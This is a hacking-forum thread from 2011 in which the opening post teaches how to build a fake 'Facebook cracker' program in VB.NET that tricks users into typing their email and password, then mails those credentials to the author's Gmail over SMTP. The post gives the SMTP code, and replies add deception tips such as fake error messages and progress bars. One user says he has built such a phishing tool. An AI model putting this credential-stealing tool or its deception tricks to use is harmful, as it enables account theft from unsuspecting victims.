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Phising with a fake messenger or facebook cracker filter_list
Phising with a fake messenger or facebook cracker #1
This is a little tutorial on how to make a fake progam

You will need: A Brain
Three textbox and label
1 Button

You make the fake program in vb.net, make a nice GUI with labelling the first label as Victim Email the second one as Receiver Email And third one as receiver password

The above is just an example you can make it anything you want but make sure its convincing

Double Click on the button 1 and paste these code
Quote: Dim NL As String = vbNewLine
Dim Mail As New MailMessage
Mail.Subject = ("Tr0ne fake Program")
Mail.To.Add("Your mail address Here") 'gmail
Mail.From = New MailAddress("Your mail address Here") 'gmail
Mail.Body = (TextBox2.Text & NL & TextBox3.Text)
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("Your email address", "Your password")
SMTP.Port = 587

Exit Sub

Hope this help Smile
Make it good looking do some windows Dressing :p

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RE: Phising with a fake messenger or facebook cracker #2
If you add Msg box's it will be more convincing !
Like :
Msgbox ("Victm Password too long ! ")
or something like that ( msg box's on the button )
You could add progress bar ( fancy :epic: )
ThisBitch Wrote:m3 w4n75 70 h4cK F4C3|300|< ?
m3 15 pr0 1337 h4X0rr !


RE: Phising with a fake messenger or facebook cracker #3
Ya your right i guess already told them to make it legit
thanks for the addition though ,ideas are always welcomeSmile

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RE: Phising with a fake messenger or facebook cracker #4
nic man...good wrk./,.//.,./,,


RE: Phising with a fake messenger or facebook cracker #5
can you provide its bulder's code?
you forgot on the top of the form1 Imports System.Net.Mail
(This post was last modified: 05-24-2011, 06:30 AM by Diablo.)


RE: Phising with a fake messenger or facebook cracker #6
Man yaa come on your using SMTP Of course you should imports this library

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RE: Phising with a fake messenger or facebook cracker #7
ok ok. please check it i have make one !

[Image: untitled.JPG?attachauth=ANoY7cowYtISkMwe...edirects=0]

i have maked some features ! check internet connections and progress bar and if a valid mail we get only the ! no bugs :hehe:
(This post was last modified: 05-24-2011, 05:41 PM by Diablo.)


RE: Phising with a fake messenger or facebook cracker #8
Good man enjoy Smile and we can't see your image

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RE: Phising with a fake messenger or facebook cracker #9
Yes your right The 7th Sage however i don't think guys that will click on the crack button have enough brain to decrypt it Tongue 99% won't

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RE: Phising with a fake messenger or facebook cracker #10
sorry the image was too big ! http://www.youtube.com/watch?v=nUHcgkz5H90 please see this videos ! sorry admin please see this video i have create a phising facebook tool. Credits to Rapidguide and Nathan Smile


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